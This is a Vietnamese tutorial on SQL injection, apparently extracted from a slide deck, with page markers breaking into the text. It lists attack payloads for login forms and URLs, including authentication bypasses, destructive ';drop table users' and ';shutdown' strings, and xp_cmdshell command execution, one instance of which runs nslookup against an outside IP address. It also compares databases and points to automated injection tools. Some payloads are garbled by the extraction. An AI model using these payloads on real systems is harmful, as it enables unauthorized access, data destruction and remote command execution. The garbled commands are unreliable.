Đa số các trang web hiện nay,tuỳ thuộc vào nội dung mà thiết kế cho riêng mình 1 giao diện bắt mắt.Để làm việc này họ chỉ cần download database từ trên Internet về và sữa đổi dữ liệu đã
Trang 1Nói thêm về SQL
Injection
Trang 2Đa số các trang web hiện nay,tuỳ thuộc vào nội dung mà thiết
kế cho riêng mình 1 giao diện bắt mắt.Để làm việc này họ chỉ cần download database từ trên Internet về và sữa đổi dữ liệu
đã được cập nhật từ 1 database.Một trong những nền phổ biến cho web datastores là SQL
Một hay nhiều ứng dụng web thì được đơn giản toàn bộ những script đầu vào bằng cách truy vấn 1 SQL database,bản thân web server hoặc 1 hệ thống đầu cuối riêng biệt.Một trong những cuộc tấn công xảo quyệt nhất ứng dụng web bao gồm việc đánh cắp queries sử dụng bởi bản thân những scripts đầu vào để tước
quyền điều khiển những ứng dụng hoặc dữ liệu của nó.Một trong những cơ cấu có hiệu quả nhất để thực hiên điều này là kĩ thuật được mang tên "SQL Injection"
SQL Injection chỉ việc đưa vào những đoạn truy vấn nguy hiểm TransacSQL vào 1 vị trí để thực hiện những hoạt động không ngờ.Thường thì những đoạn truy vấn hiện có đơn giản là Edit để
Trang 3hoàn thành những kết quả tương tự
TransactSQL thì dễ dàng vận dụng bằng sự thay thế 1 kí tự
đơn,tuỳ thuộc vào sự sáng suốt có kẻ tấn công để đưa ra những đoạn truy vấn nguy hiểm
Một số các kí tự thường được sử dụng để chèn dữ lịêu vào hợp lệ trong bao gồm (');( );và ;.Chúng có những ý nghĩa đặc biệt trong Transact SQL
Chúng ta sẽ tự hỏi là khi hacker đánh cắp được SQL query chúng
sẽ làm gì?.Ban đầu họ có thể xâm nhập trái phép các dữ liệu.Với những kĩ thuật kín đáo,họ có thể truy cập 1 cách hợp pháp,hoặc thậm chí là tìm cách hoàn toàn điều khiển toàn bộ webserver hoặc hệ thống SQL đầu cuối
Ví dụ về SQL Injection:Để tìm vị trí bị lỗi SQL Injection,ta gõ 1
số từ khoá trong Form field như sau:
+Đăng nhập hợp pháp:
-Xác nhận đúng mà không cần bất kì điều kiện nào:
Trang 4USER:' OR "='
PASS:' OR "='
-Xác nhận đúng chỉ với username:
USER:admin'
-Xác nhận đúng như là người dùng đầu tiên trong user table: USER:' or 1=1
-Xác nhận đúng như là 1 người dùng giả tạo:
USER:' union select 1,'user','passwd' 1
+Phá hoại:
-Bỏ 1 bảng dữ liệu:
USER:';drop table users
-Shutdown dữ liệu từ xa:
USER:aaaaaaaaaaaaaaa'
PASS:';shutdown
+Thực thi chức năng yêu cầu lấy và lưu trữ những thủ tục: -Thi hành xp_cmdshell để lấy 1 danh sách thư mục:
http://localhost/script?0';EXEC+master #39;dir';
Trang 5-Thi hành xp_service control để chiếm đoạt service:
http://localhost/script?0';EXECT+maste ;server';
Không phải cú pháp trên đều làm việc hầu hết trên các dữ
liệu.Thông tin sau sẽ cho biết những phương pháp chúng ta đã sơ lược phía trên sẽ làm việc hay không trong những nền chứa dữ liệu.Vì không kẻ bảng được nên mình gõ như sau cho dễ so sánh:
Datapase specific Information: -My SQL Oracle -DB2 -Postgre -MSSQL
UNION possible: -Y -Y -Y -Y -Y -
Subselects possible: -N -Y -Y -Y -Y -
Multiple
Trang 6statements: -N(mostly) -N -N -Y -Y
Default stored procedures: -_ Many(utf-file) -_ -_ -M(cmdshell)
Other Comments: -Supports"intooutfile"-_ -_ -_ -_
+Các công cụ tự động tìm lỗi SQL injection:
SQL Injection thường được thực hiện bằng kĩ thuật của
hacker,nhưng 1 vài công cụ có thể tự động quá trình nhận dạng
và khai thac chỗ yếu.Wpoison là công cụ có thể phát hiện lỗi SQLInjection trong các trang web.Những đoạn string tìm lỗi SQL thì được lưu trữ trong 1 file từ điển,và vì thế nó trở lên dễ dàng cho bất kì ai thêm vào danh sách từ điển cho riêng mình.Wpoison chạy trên Linux,có thể download tại:
http://wpoison.sourceforge.net
Trang 7Ngoài ra còn có công cụ SPIKE Proxy,nó có các chức năng khá tốt-tự động thực hiện SQL Injection -những d0oạn string sẽ được Inject tuỳ vào thói quen người sử dụng SPIKE Proxy là 1 Python
và OpenSSL-công cụ đánh giá ứng dụng web cơ bản có các chức năng như HTTP và HTTPS Proxy Nó cho phép người phát triển web hoặc người quản trị ứng dụng web cấp thấp truy cập vào tòan bộ phương tiện ứng dụng web,trong khi nó cũng cung cấp 1 nhóm các công cụ tự động và những kĩ năng khám phá ra những lỗi thông thường,các công cụ đó bao gồm:SQL Injection,Website Crawler,Login Form Brute Forcer,Automated Overflow
Detection v.vSpike Proxy chạy trên Win32 và Linux,các bạn có thể Download tại:
www.immunitysec.com/spike.html
Chú ý là phần mềm này nặng khoảng 13M và máy tính của bạn phải có sẵn Python và OpenSSL.Trong WinXP công cụ này
không hoạt động
Trang 8Mieliekoek.pl là 1 SQL Insertion Crawler,có chức năng kiểm tra các form liên quan đến lỗi SQL.Scrip này cung cấp 1 công cụ Web mirroring như là dữ liệu vào,xem xét từng file và nhân diện
sự tồn tại các form trong file.Các chuỗi được Inject có thể dễ dàng thay đổi trong file cấu hình.Download Mieliekoek tại:
http://packetstormsecurity.nl/UNIX/security/mieliekoek.pl
Công cụ này chỉ hoạt động khi máy bạn đã cài PERL.Sau đây là
1 ví dụ của dữ liệu xuất từ mieliekoek:
$badstring="blah''';
#$badstring="blah' or 1=1 ";
$badstring="blah' exec master xp_cmdshell 'nslookup a.com 196.30.67.5' - ';